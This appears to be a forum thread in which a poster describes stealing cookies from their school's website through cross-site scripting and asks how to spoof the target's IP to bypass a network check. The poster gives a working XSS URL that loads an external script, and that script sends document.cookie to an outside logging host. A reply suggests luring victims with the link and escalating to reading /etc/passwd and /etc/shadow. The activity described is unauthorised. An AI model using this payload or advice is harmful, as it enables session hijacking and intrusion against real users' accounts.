Stealing Cookies
Hey there xD
I was trying to check my school's security level, and i found out that it is quite vulnerable to xss cookie stealing. When i'm in my school's pc, i can perfectly steal cookies, but when i do this outside, with a proxy of course, i can't. There is this error saying that i need to be in the network to steal the cookies. My question is more kind of curiosity, since there is nothing about this in google…. Is there any code to camouflage your IP and make you look like the IP of your target? not any proxy, but the same target… or is there any way of trespassing this error message?
i think you'll say nope for the first question, and yep for the second one… almost sure :P
well… i'm using the following code:
http://www.example.com/search.php?query="><script src=http://www.mypage.com/cookiesteal.js>
the javascript (cookiesteal.js) contains the code:
location.href = 'http://ccl.whiteacid.org/log.php?xxxxxx'+document.cookie;
What he meant is, are you emailing the visitors the link? If you aren't, you are only going to steal your own cookies.
Also, why does the XSS matter? Are the users logging into the site? Are there cookies to steal that would give you access? If there aren't, why bother stealing cookies? You could do so much more because of the XSS. With that you could do AJAX requests for /etc/passwd and /etc/shadow if they have the right permissions. You don't even need to host a script on your own site since you can just use an XSS. That's where you should be focusing if you can't gain more access on the site by using someone else's cookies.